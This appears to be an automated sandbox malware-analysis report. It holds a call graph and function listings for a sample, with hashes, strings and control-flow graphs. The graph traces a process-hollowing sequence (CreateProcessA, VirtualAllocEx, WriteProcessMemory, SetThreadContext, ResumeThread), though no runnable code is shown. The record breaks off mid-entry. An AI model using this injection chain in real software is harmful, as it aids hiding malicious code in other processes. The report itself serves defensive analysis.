60092 6ed5a28 WriteProcessMemory 60091->60092 60093 6ed5a22 WriteProcessMemory 60091->60093 60092->60091 60093->60091 60094->60088 60095->60088 60099 6ed9aeb 60098->60099 60228 6ed53a8 60099->60228 60232 6ed53a2 60099->60232 60100 6eda11f 60100->60006 60101 6eda363 60100->60101 60236 6ed5888 60100->60236 60240 6ed5890 60100->60240 60101->60006 60102 6eda253 60108 6ed9e57 60107->60108 60110 6ed5888 Wow64SetThreadContext 60108->60110 60111 6ed5890 Wow64SetThreadContext 60108->60111 60109 6ed9e72 60110->60109 60111->60109 60113 6ed99b6 60112->60113 60116 6ed9db8 60113->60116 60117 6ed5968 VirtualAllocEx 60113->60117 60118 6ed5960 VirtualAllocEx 60113->60118 60114 6eda2a7 60115 6ed9b39 60115->60114 60119 6ed5a28 WriteProcessMemory 60115->60119 60120 6ed5a22 WriteProcessMemory 60115->60120 60116->60006 60117->60115 60118->60115 60119->60115 60120->60115 60123 6ed99b6 60121->60123 60122 6eda2a7 60124 6ed9b39 60123->60124 60125 6ed9db8 60123->60125 60128 6ed5968 VirtualAllocEx 60123->60128 60129 6ed5960 VirtualAllocEx 60123->60129 60124->60122 60126 6ed5a28 WriteProcessMemory 60124->60126 60127 6ed5a22 WriteProcessMemory 60124->60127 60125->60006 60126->60124 60127->60124 60128->60124 60129->60124 60131 6ed9b39 60130->60131 60132 6eda2a7 60131->60132 60133 6ed5a28 WriteProcessMemory 60131->60133 60134 6ed5a22 WriteProcessMemory 60131->60134 60133->60131 60134->60131 60136 6ed984b 60135->60136 60145 6ed60a4 CreateProcessA 60136->60145 60146 6ed60b0 CreateProcessA 60136->60146 60137 6ed9991 60138 6ed9db8 60137->60138 60143 6ed5968 VirtualAllocEx 60137->60143 60144 6ed5960 VirtualAllocEx 60137->60144 60138->60006 60139 6eda2a7 60140 6ed9b39 60140->60139 60141 6ed5a28 WriteProcessMemory 60140->60141 60142 6ed5a22 WriteProcessMemory 60140->60142 60141->60140 60142->60140 60143->60140 60144->60140 60145->60137 60146->60137 60149 6ed9d2f 60147->60149 60148 6eda253 60150 6eda11f 60149->60150 60152 6ed53a8 ResumeThread 60149->60152 60153 6ed53a2 ResumeThread 60149->60153 60150->60006 60151 6eda363 60150->60151 60154 6ed5888 Wow64SetThreadContext 60150->60154 60155 6ed5890 Wow64SetThreadContext 60150->60155 60151->60006 60152->60150 60153->60150 60154->60148 60155->60148 60158 6ed99ce 60156->60158 60159 6eda11f 60156->60159 60157 6eda253 60158->60159 60163 6ed53a8 ResumeThread 60158->60163 60164 6ed53a2 ResumeThread 60158->60164 60159->60006 60160 6eda363 60159->60160 60161 6ed5888 Wow64SetThreadContext 60159->60161 60162 6ed5890 Wow64SetThreadContext 60159->60162 60160->60006 60161->60157 60162->60157 60163->60159 60164->60159 60166 6ed9b39 60165->60166 60168 6ed5968 VirtualAllocEx 60165->60168 60169 6ed5960 VirtualAllocEx 60165->60169 60167 6eda2a7 60166->60167 60170 6ed5a28 WriteProcessMemory 60166->60170 60171 6ed5a22 WriteProcessMemory 60166->60171 60167->60167 60168->60166 60169->60166 60170->60166 60171->60166 60173 6ed9ad8 60172->60173 60174 6ed9b50 60172->60174 60180 6ed53a8 ResumeThread 60173->60180 60181 6ed53a2 ResumeThread 60173->60181 60175 6eda363 60175->60006 60176 6eda11f 60176->60006 60176->60175 60178 6ed5888 Wow64SetThreadContext 60176->60178 60179 6ed5890 Wow64SetThreadContext 60176->60179 60177 6eda253 60178->60177 60179->60177 60180->60176 60181->60176 60184 6ed99e0 60182->60184 60183 6eda253 60185 6eda11f 60184->60185 60187 6ed53a8 ResumeThread 60184->60187 60188 6ed53a2 ResumeThread 60184->60188 60185->60006 60186 6eda363 60185->60186 60189 6ed5888 Wow64SetThreadContext 60185->60189 60190 6ed5890 Wow64SetThreadContext 60185->60190 60186->60006 60187->60185 60188->60185 60189->60183 60190->60183 60244 6ed5b18 60191->60244 60248 6ed5b11 60191->60248 60192 6ed9b4d 60196 6ed99b6 60195->60196 60198 6ed9db8 60196->60198 60200 6ed5968 VirtualAllocEx 60196->60200 60201 6ed5960 VirtualAllocEx 60196->60201 60197 6eda2a7 60198->60006 60199 6ed9b39 60199->60197 60202 6ed5a28 WriteProcessMemory 60199->60202 60203 6ed5a22 WriteProcessMemory 60199->60203 60200->60199 60201->60199 60202->60199 60203->60199 60205 6ed6139 CreateProcessA 60204->60205 60207 6ed62fb 60205->60207 60209 6ed6139 CreateProcessA 60208->60209 60211 6ed62fb 60209->60211 60213 6ed5a28 WriteProcessMemory 60212->60213 60215 6ed5ac7 60213->60215 60215->60078 60217 6ed5a70 WriteProcessMemory 60216->60217 60219 6ed5ac7 60217->60219 60219->60078 60221 6ed59a8 VirtualAllocEx 60220->60221 60223 6ed59e5 60221->60223 60223->60091 60225 6ed59a8 VirtualAllocEx 60224->60225 60227 6ed59e5 60225->60227 60227->60091 60229 6ed53e8 ResumeThread 60228->60229 60231 6ed5419 60229->60231 60231->60100 60233 6ed53a8 ResumeThread 60232->60233 60235 6ed5419 60233->60235 60235->60100 60237 6ed58d5 Wow64SetThreadContext 60236->60237 60239 6ed591d 60237->60239 60239->60102 60241 6ed58d5 Wow64SetThreadContext 60240->60241 60243 6ed591d 60241->60243 60243->60102 60245 6ed5b63 ReadProcessMemory 60244->60245 60247 6ed5ba7 60245->60247 60247->60192 60249 6ed5b63 ReadProcessMemory 60248->60249 60251 6ed5ba7 60249->60251 60251->60192 60252 6eda6a0 60253 6eda82b 60252->60253 60255 6eda6c6 60252->60255 60255->60253 60256 6ed5cf0 60255->60256 60257 6eda920 PostMessageW 60256->60257 60258 6eda98c 60257->60258 60258->60255 60388 23f4dd2 60389 23f4ecc 60388->60389 60390 23f4e22 60388->60390 60391 23f1c9c 2 API calls 60389->60391 60392 23f4e7a CallWindowProcW 60390->60392 60393 23f4e29 60390->60393 60391->60393 60392->60393 60261 6ed65b3 60262 6ed6547 60261->60262 60263 6ed6669 60262->60263 60264 6ed94d6 12 API calls 60262->60264 60265 6ed9460 12 API calls 60262->60265 60266 6ed9470 12 API calls 60262->60266 60264->60263 60265->60263 60266->60263 59960 7fdf60 59961 7fdfa6 GetCurrentProcess 59960->59961 59963 7fdff8 GetCurrentThread 59961->59963 59964 7fdff1 59961->59964 59965 7fe02e 59963->59965 59966 7fe035 GetCurrentProcess 59963->59966 59964->59963 59965->59966 59967 7fe06b 59966->59967 59968 7fe093 GetCurrentThreadId 59967->59968 59969 7fe0c4 59968->59969 59970 23f2810 59971 23f2878 CreateWindowExW 59970->59971 59973 23f2934 59971->59973 59974 7fbbd0 59977 7fbcb8 59974->59977 59975 7fbbdf 59978 7fbcd9 59977->59978 59979 7fbcfc 59977->59979 59978->59979 59985 7fbf50 59978->59985 59989 7fbf60 59978->59989 59979->59975 59980 7fbcf4 59980->59979 59981 7fbf00 GetModuleHandleW 59980->59981 59982 7fbf2d 59981->59982 59982->59975 59986 7fbf74 59985->59986 59987 7fbf99 59986->59987 59993 7fb6c8 59986->59993 59987->59980 59990 7fbf74 59989->59990 59991 7fbf99 59990->59991 59992 7fb6c8 LoadLibraryExW 59990->59992 59991->59980 59992->59991 59994 7fc140 LoadLibraryExW 59993->59994 59996 7fc1b9 59994->59996 59996->59987 60394 23f98d0 60395 23f98fd 60394->60395 60399 68f4990 60395->60399 60403 68f49a0 60395->60403 60396 23fb4b6 60401 68f49b3 60399->60401 60400 68f49d6 60400->60396 60401->60400 60402 68f1894 DrawTextExW 60401->60402 60402->60400 60405 68f49b3 60403->60405 60404 68f49d6 60404->60396 60405->60404 60406 68f1894 DrawTextExW 60405->60406 60406->60404

                                                        Executed Functions

                                                        Function 06A12368 Relevance: 11.0, Strings: 8, Instructions: 970COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 294 6a12368-6a139df 297 6a139e5-6a139eb 294->297 298 6a13b8d-6a13bde 294->298 299 6a139ed-6a139f4 297->299 300 6a13a2c-6a13a40 297->300 322 6a13be0-6a13bed 298->322 323 6a13bf8-6a13c05 298->323 301 6a139f6-6a13a03 299->301 302 6a13a0e-6a13a27 call 6a125d4 299->302 303 6a13a62-6a13a6b 300->303 304 6a13a42-6a13a46 300->304 301->302 302->300 306 6a13a85-6a13aa1 303->306 307 6a13a6d-6a13a7a 303->307 304->303 308 6a13a48-6a13a54 304->308 320 6a13aa7-6a13ab2 306->320 321 6a13b49-6a13b6d 306->321 307->306 308->303 317 6a13a56-6a13a5c 308->317 317->303 329 6a13ab4-6a13aba 320->329 330 6a13aca-6a13ad1 320->330 335 6a13b77 321->335 336 6a13b6f 321->336 322->323 569 6a13c07 call 6a13d60 323->569 570 6a13c07 call 6a13992 323->570 571 6a13c07 call 6a125d4 323->571 572 6a13c07 call 6a12368 323->572 573 6a13c07 call 6a13b8c 323->573 327 6a13c0d-6a13c12 333 6a13c14-6a13c1b 327->333 334 6a13c59-6a13c60 327->334 337 6a13abc 329->337 338 6a13abe-6a13ac0 329->338 331 6a13ad3-6a13add 330->331 332 6a13ae5-6a13b08 330->332 331->332 350 6a13b19-6a13b2a 332->350 351 6a13b0a-6a13b17 332->351 339 6a13c35-6a13c4a 333->339 340 6a13c1d-6a13c2a 333->340 341 6a13c62-6a13c6f 334->341 342 6a13c7a-6a13c83 334->342 335->298 336->335 337->330 338->330 339->334 353 6a13c4c-6a13c53 339->353 340->339 341->342 344 6a13c85-6a13c87 342->344 345 6a13c89-6a13c8c 342->345 348 6a13c8d-6a13c9e 344->348 345->348 358 6a13ce1-6a13ce4 348->358 359 6a13ca0-6a13ca7 348->359 360 6a13b37-6a13b43 350->360 361 6a13b2c-6a13b2f 350->361 351->350 351->360 353->334 357 6a13ce7-6a13d12 353->357 371 6a13d19-6a13d7a 357->371 362 6a13cc1-6a13cd6 359->362 363 6a13ca9-6a13cb6 359->363 360->320 360->321 361->360 362->358 369 6a13cd8-6a13cdf 362->369 363->362 369->358 369->371 378 6a13d92-6a13d98 371->378 379 6a13d7c-6a13d7f 371->379 380 6a13e08-6a13e60 378->380 381 6a13d9a-6a13da1 378->381 382 6a13d88-6a13d8f 379->382 383 6a13e67-6a13ebf 380->383 381->383 384 6a13da7-6a13db7 381->384 389 6a13ec6-6a13fd4 383->389 384->389 390 6a13dbd-6a13dc1 384->390 431 6a14026-6a1407e 389->431 432 6a13fd6-6a13fe6 389->432 392 6a13dc4-6a13dc6 390->392 395 6a13dc8-6a13dd8 392->395 396 6a13deb-6a13ded 392->396 404 6a13dc3 395->404 405 6a13dda-6a13de9 395->405 397 6a13dfc-6a13e05 396->397 398 6a13def-6a13df9 396->398 404->392 405->396 405->404 435 6a14085-6a14170 431->435 432->435 436 6a13fec-6a13ff0 432->436 470 6a14172-6a14192 435->470 471 6a141a6-6a141a7 435->471 437 6a13ff3-6a13ff5 436->437 439 6a13ff7-6a14007 437->439 440 6a14009-6a1400b 437->440 439->440 448 6a13ff2 439->448 442 6a1401a-6a14023 440->442 443 6a1400d-6a14017 440->443 448->437 472 6a14194-6a141a5 470->472 473 6a141aa-6a141b0 470->473 472->471 474 6a141b2-6a141b9 473->474 475 6a1422a-6a14282 473->475 477 6a14289-6a142e1 474->477 478 6a141bf-6a141c3 474->478 475->477 480 6a142e8-6a143ec 477->480 479 6a141c9-6a141cd 478->479 478->480 482 6a141d0-6a141dd 479->482 525 6a14448-6a144a0 480->525 526 6a143ee-6a143f2 480->526 489 6a14202-6a1420f 482->489 490 6a141df-6a141ef 482->490 500 6a14211-6a1421b 489->500 501 6a1421e-6a14227 489->501 497 6a141f1-6a14200 490->497 498 6a141cf 490->498 497->489 497->498 498->482 527 6a144a7-6a145a0 525->527 526->527 528 6a143f8-6a143fc 526->528 565 6a145a2-6a145a8 527->565 566 6a145b8-6a145b9 527->566 530 6a143ff-6a1440c 528->530 535 6a14420-6a1442d 530->535 536 6a1440e-6a1441e 530->536 543 6a1443c-6a14445 535->543 544 6a1442f-6a14439 535->544 536->535 542 6a143fe 536->542 542->530 567 6a145aa 565->567 568 6a145ac-6a145ae 565->568 567->566 568->566 569->327 570->327 571->327 572->327 573->327
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (bq$Hbq$Hbq$Hbq$Hbq$Hbq$Hbq$PH^q
                                                        • API String ID: 0-3076519024
                                                        • Opcode ID: 6949f7edbb5c40d84344f39b2c374909f40d930b1c89c8f855e7f36e186ea401
                                                        • Instruction ID: 883964d918cf2dc5f2ef03371898406780b64bede3c7d39a5ddcfa4f7244ea71
                                                        • Opcode Fuzzy Hash: 6949f7edbb5c40d84344f39b2c374909f40d930b1c89c8f855e7f36e186ea401
                                                        • Instruction Fuzzy Hash: 83728930B002148FCB54AF79C85466E7BA6AFC9310F248579D50ADF3A5CE35DD46CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A1A688 Relevance: 8.5, Strings: 6, Instructions: 1042COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 574 6a1a688-6a1a6a9 575 6a1a6b0-6a1a79c 574->575 576 6a1a6ab 574->576 578 6a1a7a2-6a1a8f9 575->578 579 6a1afce-6a1aff6 575->579 576->575 623 6a1af9c-6a1afcb 578->623 624 6a1a8ff-6a1a95a 578->624 582 6a1b6df-6a1b6e8 579->582 583 6a1b004-6a1b00d 582->583 584 6a1b6ee-6a1b705 582->584 586 6a1b014-6a1b108 583->586 587 6a1b00f 583->587 605 6a1b132 586->605 606 6a1b10a-6a1b116 586->606 587->586 610 6a1b138-6a1b158 605->610 608 6a1b120-6a1b126 606->608 609 6a1b118-6a1b11e 606->609 611 6a1b130 608->611 609->611 615 6a1b1b8-6a1b232 610->615 616 6a1b15a-6a1b1b3 610->616 611->610 635 6a1b234-6a1b287 615->635 636 6a1b289-6a1b2cc 615->636 628 6a1b6dc 616->628 623->579 630 6a1a95c 624->630 631 6a1a95f-6a1a96a 624->631 628->582 630->631 634 6a1aeae-6a1aeb4 631->634 637 6a1aeba-6a1af37 634->637 638 6a1a96f-6a1a98d 634->638 664 6a1b2d7-6a1b2dd 635->664 636->664 681 6a1af86-6a1af8c 637->681 641 6a1a9e4-6a1a9f9 638->641 642 6a1a98f-6a1a993 638->642 644 6a1aa00-6a1aa16 641->644 645 6a1a9fb 641->645 642->641 647 6a1a995-6a1a9a0 642->647 649 6a1aa18 644->649 650 6a1aa1d-6a1aa34 644->650 645->644 651 6a1a9d6-6a1a9dc 647->651 649->650 655 6a1aa36 650->655 656 6a1aa3b-6a1aa51 650->656 653 6a1a9a2-6a1a9a6 651->653 654 6a1a9de-6a1a9df 651->654 660 6a1a9a8 653->660 661 6a1a9ac-6a1a9c4 653->661 658 6a1aa62-6a1aad3 654->658 655->656 662 6a1aa53 656->662 663 6a1aa58-6a1aa5f 656->663 669 6a1aad5 658->669 670 6a1aae9-6a1ac61 658->670 660->661 666 6a1a9c6 661->666 667 6a1a9cb-6a1a9d3 661->667 662->663 663->658 668 6a1b334-6a1b340 664->668 666->667 667->651 672 6a1b342-6a1b3ca 668->672 673 6a1b2df-6a1b301 668->673 669->670 671 6a1aad7-6a1aae3 669->671 678 6a1ac63 670->678 679 6a1ac77-6a1adb2 670->679 671->670 703 6a1b54f-6a1b558 672->703 676 6a1b303 673->676 677 6a1b308-6a1b331 673->677 676->677 677->668 678->679 683 6a1ac65-6a1ac71 678->683 693 6a1adb4-6a1adb8 679->693 694 6a1ae16-6a1ae2b 679->694 684 6a1af39-6a1af83 681->684 685 6a1af8e-6a1af94 681->685 683->679 684->681 685->623 693->694 697 6a1adba-6a1adc9 693->697 695 6a1ae32-6a1ae53 694->695 696 6a1ae2d 694->696 700 6a1ae55 695->700 701 6a1ae5a-6a1ae79 695->701 696->695 702 6a1ae08-6a1ae0e 697->702 700->701 708 6a1ae80-6a1aea0 701->708 709 6a1ae7b 701->709 704 6a1ae10-6a1ae11 702->704 705 6a1adcb-6a1adcf 702->705 706 6a1b3cf-6a1b3e4 703->706 707 6a1b55e-6a1b5b9 703->707 710 6a1aeab 704->710 711 6a1add1-6a1add5 705->711 712 6a1add9-6a1adfa 705->712 713 6a1b3e6 706->713 714 6a1b3ed-6a1b543 706->714 731 6a1b5f0-6a1b61a 707->731 732 6a1b5bb-6a1b5ee 707->732 715 6a1aea2 708->715 716 6a1aea7 708->716 709->708 710->634 711->712 717 6a1ae01-6a1ae05 712->717 718 6a1adfc 712->718 713->714 719 6a1b3f3-6a1b433 713->719 720 6a1b4c2-6a1b502 713->720 721 6a1b438-6a1b478 713->721 722 6a1b47d-6a1b4bd 713->722 735 6a1b549 714->735 715->716 716->710 717->702 718->717 719->735 720->735 721->735 722->735 740 6a1b623-6a1b6b6 731->740 732->740 735->703 744 6a1b6bd-6a1b6d5 740->744 744->628
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: &IH3$4'^q$TJcq$Te^q$pbq$xbaq
                                                        • API String ID: 0-1216527603
                                                        • Opcode ID: 766568a4d5566c2cecda1a6b95561f5decc615e1ab60d9734776fea301b21687
                                                        • Instruction ID: 9668a7e86c8eeb83575bc2c1595580c01fbc341a7f73a19e745eee2130e40aed
                                                        • Opcode Fuzzy Hash: 766568a4d5566c2cecda1a6b95561f5decc615e1ab60d9734776fea301b21687
                                                        • Instruction Fuzzy Hash: D3B2C475E00628CFDB54DF69C984AD9BBB2FF89304F1581E9E509AB225DB319E81CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06D37A20 Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 3161 6d37a20-6d37a43 3162 6d37a45 3161->3162 3163 6d37a4a-6d37ac0 3161->3163 3162->3163 3168 6d37ac3 3163->3168 3169 6d37aca-6d37ae6 3168->3169 3170 6d37ae8 3169->3170 3171 6d37aef-6d37af0 3169->3171 3170->3168 3170->3171 3172 6d37c22-6d37c39 3170->3172 3173 6d37c01-6d37c1d 3170->3173 3174 6d37b50-6d37b54 3170->3174 3175 6d37b80-6d37b92 3170->3175 3176 6d37b97-6d37bc1 3170->3176 3177 6d37bc6-6d37bfc 3170->3177 3178 6d37af5-6d37b0a 3170->3178 3179 6d37c3e-6d37cae 3170->3179 3180 6d37b0c-6d37b4b 3170->3180 3171->3179 3172->3169 3173->3169 3181 6d37b67-6d37b6e 3174->3181 3182 6d37b56-6d37b65 3174->3182 3175->3169 3176->3169 3177->3169 3178->3169 3193 6d37cb6-6d37cc0 3179->3193 3180->3169 3183 6d37b75-6d37b7b 3181->3183 3182->3183 3183->3169
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q$Te^q$)"
                                                        • API String ID: 0-4031938444
                                                        • Opcode ID: 4faed6147cacc38f452498a1f86029a67b2be3a729283f655a46d7126433f8c9
                                                        • Instruction ID: 8c145fe9f8f4dbfb7b30dc1977c4027cb3b07522bebf4abfb3b690f5e90db846
                                                        • Opcode Fuzzy Hash: 4faed6147cacc38f452498a1f86029a67b2be3a729283f655a46d7126433f8c9
                                                        • Instruction Fuzzy Hash: AD81D5B4E006199FDB48CFEAC984AAEFBB2FF88300F14942AD519AB354D7349945CF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06D39BC0 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tIh
                                                        • API String ID: 0-443931868
                                                        • Opcode ID: 9427bdded998bb2c40b3af16a7696beddc83af4c64e82aa447f07ae1159ca529
                                                        • Instruction ID: a0a8f08f73f01ab7168097b994bedd9056d75eebb851dc91d19eea95c335e35c
                                                        • Opcode Fuzzy Hash: 9427bdded998bb2c40b3af16a7696beddc83af4c64e82aa447f07ae1159ca529
                                                        • Instruction Fuzzy Hash: BBD15770E0521ADFDB44CF9AD4948AEFBB2FF88300B14D559D512AB214E774EA82CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A16CD8 Relevance: .8, Instructions: 800COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f145c6049a046d58414f990b9a42e8941bdee72adc50467502ae09c52def9cf1
                                                        • Instruction ID: d3cdc876d487cddf33572d584bb5294550da97245cb27b576c3f4d9f84ecf7c7
                                                        • Opcode Fuzzy Hash: f145c6049a046d58414f990b9a42e8941bdee72adc50467502ae09c52def9cf1
                                                        • Instruction Fuzzy Hash: 50721C70A00219CFCB54EF68C994AADB7B2FF89310F1586A9D459AB351DB30ED85CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06D3C900 Relevance: .2, Instructions: 204COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a074d81bf4e5a5a459479280e1678d291f994690b289c1cc636e4d7acb9ee23a
                                                        • Instruction ID: 791788d545657b622885a7c842b6e5572542b342cba8fb45465bf010e67b220e
                                                        • Opcode Fuzzy Hash: a074d81bf4e5a5a459479280e1678d291f994690b289c1cc636e4d7acb9ee23a
                                                        • Instruction Fuzzy Hash: 4D810074E1422ADFDB44CFA9C8809AEFBB2FB88300F10955AD455BB254D7789906CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A19C15 Relevance: .1, Instructions: 85COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 190a6c800bebeb0475f3fcc2ccef6c70b65e8b79840376913d13183846486bb7
                                                        • Instruction ID: b5f20d8ddab4af924f5dc53a1f700c51d270d0fcd6ae4b5c406f4dba3b058f07
                                                        • Opcode Fuzzy Hash: 190a6c800bebeb0475f3fcc2ccef6c70b65e8b79840376913d13183846486bb7
                                                        • Instruction Fuzzy Hash: E331AFB1D056588BD709EFAE895429EFBF2EFC9300F18C17AC4595F269DB300946CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A19CB8 Relevance: .1, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3ad7e3e64074a1bc55f4460ef504cc7a08185fe58b78336b2c5b616770d0d61d
                                                        • Instruction ID: b2d84e7475e400060d53da45eb1033614617ef0b8255325bc7d529fef41669ba
                                                        • Opcode Fuzzy Hash: 3ad7e3e64074a1bc55f4460ef504cc7a08185fe58b78336b2c5b616770d0d61d
                                                        • Instruction Fuzzy Hash: 0A214AB1E056088BEB1CDFABC80429EBBF7AFC9300F04C07AD5186B268EB700546CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A19CC8 Relevance: .1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5a5c368c507c1e84f0a9c8cd9616f12a8b3b6fe119b5b6a8787452387c67ebf9
                                                        • Instruction ID: 47771195c059e6db30c804b56bcba48fa3ddf65820fa69f6b210844710c8b32b
                                                        • Opcode Fuzzy Hash: 5a5c368c507c1e84f0a9c8cd9616f12a8b3b6fe119b5b6a8787452387c67ebf9
                                                        • Instruction Fuzzy Hash: EF11E971E056188BEB5CDFABD90429EBAF7AFC9300F04C07A9519AB258EB740946CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 007FDF58 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 745 7fdf58-7fdfef GetCurrentProcess 750 7fdff8-7fe02c GetCurrentThread 745->750 751 7fdff1-7fdff7 745->751 752 7fe02e-7fe034 750->752 753 7fe035-7fe069 GetCurrentProcess 750->753 751->750 752->753 754 7fe06b-7fe071 753->754 755 7fe072-7fe08d call 7fe130 753->755 754->755 759 7fe093-7fe0c2 GetCurrentThreadId 755->759 760 7fe0cb-7fe12d 759->760 761 7fe0c4-7fe0ca 759->761 761->760
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 007FDFDE
                                                        • GetCurrentThread.KERNEL32 ref: 007FE01B
                                                        • GetCurrentProcess.KERNEL32 ref: 007FE058
                                                        • GetCurrentThreadId.KERNEL32 ref: 007FE0B1
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1761249544.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: 6612569eb14df7c8bb1739eed2bdc98bf4436d8a2eef00e71ab7778cd55f6408
                                                        • Instruction ID: b476098ec1d546ddd7e0d889012a29374282f2d6ccc278552378a009095b3f31
                                                        • Opcode Fuzzy Hash: 6612569eb14df7c8bb1739eed2bdc98bf4436d8a2eef00e71ab7778cd55f6408
                                                        • Instruction Fuzzy Hash: F65167B0900209CFDB14DFA9D548BEEBBF1EF88314F208569E419A7360DB749984CF65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 007FDF60 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 768 7fdf60-7fdfef GetCurrentProcess 772 7fdff8-7fe02c GetCurrentThread 768->772 773 7fdff1-7fdff7 768->773 774 7fe02e-7fe034 772->774 775 7fe035-7fe069 GetCurrentProcess 772->775 773->772 774->775 776 7fe06b-7fe071 775->776 777 7fe072-7fe08d call 7fe130 775->777 776->777 781 7fe093-7fe0c2 GetCurrentThreadId 777->781 782 7fe0cb-7fe12d 781->782 783 7fe0c4-7fe0ca 781->783 783->782
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 007FDFDE
                                                        • GetCurrentThread.KERNEL32 ref: 007FE01B
                                                        • GetCurrentProcess.KERNEL32 ref: 007FE058
                                                        • GetCurrentThreadId.KERNEL32 ref: 007FE0B1
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1761249544.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: 8ca87177092eedb9c2d571519db9512239acd6afeb6f0fbacc71b25ac5527fa4
                                                        • Instruction ID: eeeb864c0b05e1dcfcf484bd74e7ea42cb2ce50598ce6d81fe329812f55c3bb6
